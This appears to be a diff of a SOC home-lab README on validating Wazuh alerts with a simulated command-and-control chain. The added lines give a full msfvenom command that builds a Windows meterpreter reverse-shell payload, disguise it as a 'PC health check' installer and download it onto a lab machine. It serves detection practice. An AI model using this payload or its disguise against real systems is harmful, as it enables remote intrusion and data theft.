san1cs/SOC_Home_Lab/9_Wazuh_Deployment_&_Alert_Validation/README.md

 ### 4.1.Full Attack Chain: Command and Control (C2)

-* Creating a malware uisng msfvenom ``.
+* Creating a malware uisng msfvenom `sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.251.3 LPORT=4444 --platform windows -a x64 -f exe -o WindowsPCHealthCheckSetup.msi.exe`.

-* Hosted it on `/var/www/html/WinUpdatex64` in kali.
+* Hosted it on `/var/www/html/WindowsPCHealthCheckSetup.msi.exe` in kali.

-* * _Windows defender real time protection is turned off for this lab demonstration._
+* _Windows defender real time protection is turned off for this lab demonstration._

-* Downloading the malware from `http://192.168.251.3/WinUpdatex64` and running it on windows to make the remote connecion for command and control.
+* Downloading the malware from `http://192.168.251.3/WindowsPCHealthCheckSetup.msi.exe` and running it on windows to make the remote connecion for command and control.

 * Meterpreter session opened in multi/handler.

+* **Executing Privilege Escalation:** ``

+* Deleting/Moving the malware deep inside the system ``

+* **Setting Persistence:** ``

+* Stealing/Damaging the data.

-### 4.2.Post-Exploitation Analysis: Detecting C2 Persistence and Lateral Movement
+### 4.2.Post-Exploitation Analysis: Privilege Escalation and Detecting C2 Persistence